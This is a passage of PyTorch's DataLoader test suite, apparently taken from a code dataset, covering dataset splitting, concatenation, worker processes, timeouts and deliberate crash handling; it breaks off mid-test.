source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
test_dataloader.py | # Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
IterDataPipe,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE,
IS_MACOS)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
try:
import numpy as np
HAS_NUMPY = True
except ImportError:
HAS_NUMPY = False
skipIfNoNumpy = unittest.skipIf(not HAS_NUMPY, "no NumPy")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminiates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start method is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for a inter-process communication can be highly varying. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
def test_lengths_must_equal_dataset_size(self):
with self.assertRaises(ValueError):
random_split([1, 2, 3, 4], [1, 2])
def test_splits_have_correct_size(self):
splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
self.assertEqual(len(splits), 2)
self.assertEqual(len(splits[0]), 2)
self.assertEqual(len(splits[1]), 4)
def test_splits_are_mutually_exclusive(self):
data = [5, 2, 3, 4, 1, 6]
splits = random_split(data, [2, 4])
all_values = []
all_values.extend(list(splits[0]))
all_values.extend(list(splits[1]))
data.sort()
all_values.sort()
self.assertListEqual(data, all_values)
def test_splits_indexing_type(self):
r"""Indices generated by random_split
should be of integer type
"""
class CustomDataset():
def __init__(self, test_object, custom_list):
self.data = custom_list
self.test_object = test_object
def __getitem__(self, key):
self.test_object.assertEqual(type(key), type(0))
return self.data[key]
def __len__(self):
return len(self.data)
x = [1, 2, 3, 4, 5]
dataset = CustomDataset(self, x)
dataset = random_split(dataset, [5])[0]
data_loader = DataLoader(dataset)
for batch in data_loader:
pass
def test_splits_reproducibility(self):
self.assertEqual(
[list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
[[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
)
self.assertEqual(
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
)
def test_splits_generator(self):
# A random_split without a specific generator should affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5])
b = torch.rand(10)
self.assertNotEqual(a, b)
# A random_split with a specific generator should not affect the default one
state = torch.get_rng_state()
a = torch.rand(10)
torch.set_rng_state(state)
random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
b = torch.rand(10)
self.assertEqual(a, b)
def test_slicing_of_subset_of_dataset(self):
# Testing slicing a subset initialized with a dataset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_dataset[:], dataset[:])
self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset from random split
subset1, subset2 = random_split(dataset, [3, 2])
self.assertEqual(subset1[:], dataset[subset1.indices[:]])
self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
def test_slicing_of_subset_of_subset(self):
# Testing slicing a subset initialized with a subset
dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
self.assertEqual(subset_of_subset[:], dataset[:])
self.assertEqual(subset_of_subset[0:2], dataset[0:2])
self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
# Testing slicing of subset of subset from random split
subset1, subset2 = random_split(dataset, [4, 1])
subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
idx = [subset1.indices[i] for i in subset_of_subset1.indices]
self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
def __init__(self, n):
super(CUDACountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return torch.as_tensor(i, device='cuda')
def __len__(self):
return self.n
class CountingDataset(Dataset):
def __init__(self, n):
super(CountingDataset, self).__init__()
self.n = n
def __getitem__(self, i):
return i
def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
# Setting disable_stderr=True may generate a lot of unrelated error outputs
# but could be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
# ESRCH means that os.kill can't finds alive proc
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
# Inspired by https://stackoverflow.com/a/26703365
# If all workers will call `sync_once`, they will be blocked until all workers
# reach the call (i.e., acting like a barrier).
# This can be used to ensure that each worker at least processes one data.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=_test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# _test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
class TestMultiEpochDataset(IterableDataset):
def __init__(self, length):
self.length = length
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
worker_id = worker_info.id
for idx in range(self.length // worker_info.num_workers):
yield worker_id
def __len__(self):
return self.length
class CustomList(list):
pass
class CustomDict(dict):
pass
def row_processor(row):
return np.add(row, 1)
def filter_len(row):
return len(row) == 4
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
if persistent_workers and kwargs.get('num_workers', 0) == 0:
persistent_workers = False
kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
super(RandomDataset).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
